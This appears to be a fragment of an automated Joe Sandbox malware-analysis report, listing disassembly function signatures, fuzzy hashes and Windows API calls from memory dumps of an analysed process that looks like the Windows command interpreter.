• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _get_osfhandlememset$wcschr
                                                                                                                                                                        • String ID: DPATH
                                                                                                                                                                        • API String ID: 3260997497-2010427443
                                                                                                                                                                        • Opcode ID: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                                                                                                                                                                        • Instruction ID: e429f694a15b71cba3f8e477f41b00a633eee9f726c2a2a7781bcec406003a63
                                                                                                                                                                        • Opcode Fuzzy Hash: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                                                                                                                                                                        • Instruction Fuzzy Hash: 10D18823A08682C2EB249F7598447BD62A1FF85B94F048231DA1DC77D5DF3EE849C74A
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                                                                                                                                        • String ID: @P
                                                                                                                                                                        • API String ID: 1801357106-3670739982
                                                                                                                                                                        • Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                                                                                                        • Instruction ID: 2224205e8b6eab4c055c87ffff21cf22ec9d6fdf2169e38779ea6eb208106058
                                                                                                                                                                        • Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                                                                                                        • Instruction Fuzzy Hash: C2413733B04A46DAE7108F70D4443EDABA0FB89758F848231EA1E92A88DF79D509CB45
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$BufferConsoleInfoScreen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1034426908-0
                                                                                                                                                                        • Opcode ID: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                                                                                                                                                        • Instruction ID: 6352f823e990107aaa31b8c739dd4f50514c4595b1341ae2f00a397b0a20a08d
                                                                                                                                                                        • Opcode Fuzzy Hash: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                                                                                                                                                        • Instruction Fuzzy Hash: 9AF19D33A08782CAEB68CF2198403E977A4FF45788F408131DA4ECB695DF3AE559C706
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseValue$CreateDeleteOpen
                                                                                                                                                                        • String ID: %s=%s$\Shell\Open\Command
                                                                                                                                                                        • API String ID: 4081037667-3301834661
                                                                                                                                                                        • Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                                                                                                                        • Instruction ID: b15d6751c3c2fda5eb23b50df203dc74cdcdb0a35f2b075443831fdac21ed0e4
                                                                                                                                                                        • Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                                                                                                                        • Instruction Fuzzy Hash: BE71E463B09752E2EB608F65A4503BAA2E1FF84B80F944131DE4E87784DF3ED44ACB05
APIs
• RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6E944AA85
• RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6E944AACF
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6E944AAEC
• RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6E94498C0), ref: 00007FF6E944AB39
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6E94498C0), ref: 00007FF6E944AB6F
• RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6E94498C0), ref: 00007FF6E944ABA4
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6E94498C0), ref: 00007FF6E944ABCB
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: CloseDeleteValue$CreateOpen
• String ID: %s=%s
• API String ID: 1019019434-1087296587
Similarity
• API ID: _wcsnicmpwcsrchr
• String ID: COPYCMD
• API String ID: 2429825313-3727491224
Similarity
• API ID: memset$FullNamePathwcsrchr
• String ID:
• API String ID: 4289998964-0
Similarity
• API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
• String ID:
• API String ID: 3476366620-0
Similarity
• API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
• String ID: %9d
• API String ID: 1006866328-2241623522
Similarity
• API ID: memset
• String ID:
• API String ID: 2221118986-0
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0
                                                                                                                                                                        • Opcode ID: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                                                                                                                        • Instruction ID: 196384e80c03512715f8046446fb692c4e39210bb60e0eb83bc377972af5c520
                                                                                                                                                                        • Opcode Fuzzy Hash: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                                                                                                                        • Instruction Fuzzy Hash: 8AA1B123A28642C6EB54DF26A45577967E0FF88B80F504135DE4EC7791EE3EE409C70A
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$DiskFreeSpace
                                                                                                                                                                        • String ID: %5lu
                                                                                                                                                                        • API String ID: 2448137811-2100233843
                                                                                                                                                                        • Opcode ID: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                                                                                                                                                        • Instruction ID: 6d3826518709258ceabc9986158cac8db56d3c8b7ec659a2cf81a5832b6a1b01
                                                                                                                                                                        • Opcode Fuzzy Hash: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                                                                                                                                                        • Instruction Fuzzy Hash: 4E418B63608AC2C5EB61DF61E8447EA6360FF84788F408032EA4D8BB48DF7DD14ACB05
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsicmp
                                                                                                                                                                        • String ID: GeToken: (%x) '%s'
                                                                                                                                                                        • API String ID: 2081463915-1994581435
                                                                                                                                                                        • Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                                                                                                                        • Instruction ID: f184d66e61f572ce9ea4a638f1b849d773b83185327a965e805fffd4258319ee
                                                                                                                                                                        • Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                                                                                                                        • Instruction Fuzzy Hash: 5E717763E0C686C5FB64AF64A84837A22E0BF11754F544539D90EC76E1EF3EA48DC34A
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcschr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1497570035-0
                                                                                                                                                                        • Opcode ID: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                                                                                                                                                        • Instruction ID: 9df6d3c1c8ece93a02338c264648b72fb9ddde2b9aeebd305e6e074254e51622
                                                                                                                                                                        • Opcode Fuzzy Hash: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                                                                                                                                                        • Instruction Fuzzy Hash: 09C10563A18642C2EB54DF22A4543BD67A0FF84784F044135EA5EC77D5EE3EE448C70A
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3541575487-0
                                                                                                                                                                        • Opcode ID: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                                                                                                                                                        • Instruction ID: 2730b5ebdb9fbe5e7daddfc6da4ece19d1ef3920b26cc068115eb6ed4f65b4ca
                                                                                                                                                                        • Opcode Fuzzy Hash: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                                                                                                                                                        • Instruction Fuzzy Hash: D4A12163B28292C1EE249F6594143B96290AF44BE4F544330EE6EC77C4EE3EE64BC705
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E942CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDA6
                                                                                                                                                                          • Part of subcall function 00007FF6E942CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDBD
                                                                                                                                                                        • _pipe.MSVCRT ref: 00007FF6E9426C1E
                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF6E9426CD1
                                                                                                                                                                        • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF6E9426CFB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heapwcschr$AllocDuplicateHandleProcess_dup_dup2_get_osfhandle_pipe_wcsicmpmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 624391571-0
                                                                                                                                                                        • Opcode ID: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                                                                                                                                                        • Instruction ID: d18856b5c33bc889b69867f617265c2e98839683751579b1101ef0a53d14e419
                                                                                                                                                                        • Opcode Fuzzy Hash: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                                                                                                                                                        • Instruction Fuzzy Hash: 9071AF73A18602C6E714AF25D84023D76A2FF89754F188234DA1DD73D6DF3EA44ACB0A
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4268342597-0
                                                                                                                                                                        • Opcode ID: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                                                                                                                                                        • Instruction ID: d330ed25f77f10026c1d252b497b5638fc7c6951796b9c0a60d9d412ee496411
                                                                                                                                                                        • Opcode Fuzzy Hash: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                                                                                                                                                        • Instruction Fuzzy Hash: 19813823A08786C1EB658F25A84037977A0FF58B84F184139CD4D87794DE3EE48ACB4A
APIs
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: OpenToken$CloseProcessThread
• String ID:
• API String ID: 2991381754-0
APIs
• GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF6E944C59E), ref: 00007FF6E9425879
  • Part of subcall function 00007FF6E94258D4: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6E9425903
  • Part of subcall function 00007FF6E94258D4: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6E9425943
  • Part of subcall function 00007FF6E94258D4: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6E9425956
Strings
Similarity
• API ID: CloseOpenQueryValueVersion
• String ID: %d.%d.%05d.%d
• API String ID: 2996790148-3457777122
APIs
Similarity
• API ID: memset$ErrorFileFindFirstLast
• String ID:
• API String ID: 2831795651-0
APIs
• memset.MSVCRT ref: 00007FF6E9427DA1
  • Part of subcall function 00007FF6E943417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6E94341AD
  • Part of subcall function 00007FF6E942D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6E942D46E
  • Part of subcall function 00007FF6E942D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6E942D485
  • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D4EE
  • Part of subcall function 00007FF6E942D3F0: iswspace.MSVCRT ref: 00007FF6E942D54D
  • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D569
  • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D58C
• ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6E9427EB7
Similarity
• API ID: wcschr$Heapmemset$AllocCurrentDirectoryProcessiswspace
• String ID:
• API String ID: 168394030-0
APIs
Similarity
• API ID: InformationQueryToken
• String ID:
• API String ID: 4239771691-0
APIs
Similarity
• API ID: FileInformation$HandleQueryVolume
• String ID:
• API String ID: 2149833895-0
APIs
• GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF6E9444227), ref: 00007FF6E9448678
• SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?,?,?,?,?,00000000,00007FF6E9444227), ref: 00007FF6E94486D4
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Time$System$File
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2838179519-0
                                                                                                                                                                        • Opcode ID: 62ebdb23c5db016c2826862ffbff753f6fa70ff692e943220732cd29ca21f8c9
                                                                                                                                                                        • Instruction ID: 3ac0bf8ecc29be41780c35977a8ebdec82a587fb997796a359f719ad4b7fd324
                                                                                                                                                                        • Opcode Fuzzy Hash: 62ebdb23c5db016c2826862ffbff753f6fa70ff692e943220732cd29ca21f8c9
                                                                                                                                                                        • Instruction Fuzzy Hash: 07113C57528681C6DB248F65E00027AB370FFACB49B149122FE8DC7764EB3DC946CB1A
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6E942D46E
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6E942D485
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D4EE
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: iswspace.MSVCRT ref: 00007FF6E942D54D
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D569
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D58C
                                                                                                                                                                        • towupper.MSVCRT ref: 00007FF6E94285D4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcschr$Heap$AllocProcessiswspacetowupper
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3520273530-0
                                                                                                                                                                        • Opcode ID: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                                                                                                                                                        • Instruction ID: 046c621fdc9dd12206b454c5c7356857bc1a94c073003c19a5450df0611d015b
                                                                                                                                                                        • Opcode Fuzzy Hash: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                                                                                                                                                        • Instruction Fuzzy Hash: B161AE23A08206C6F7689E75A5183BD36A0FF08754F408136DA1ED73D5DE3EA498C71A
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
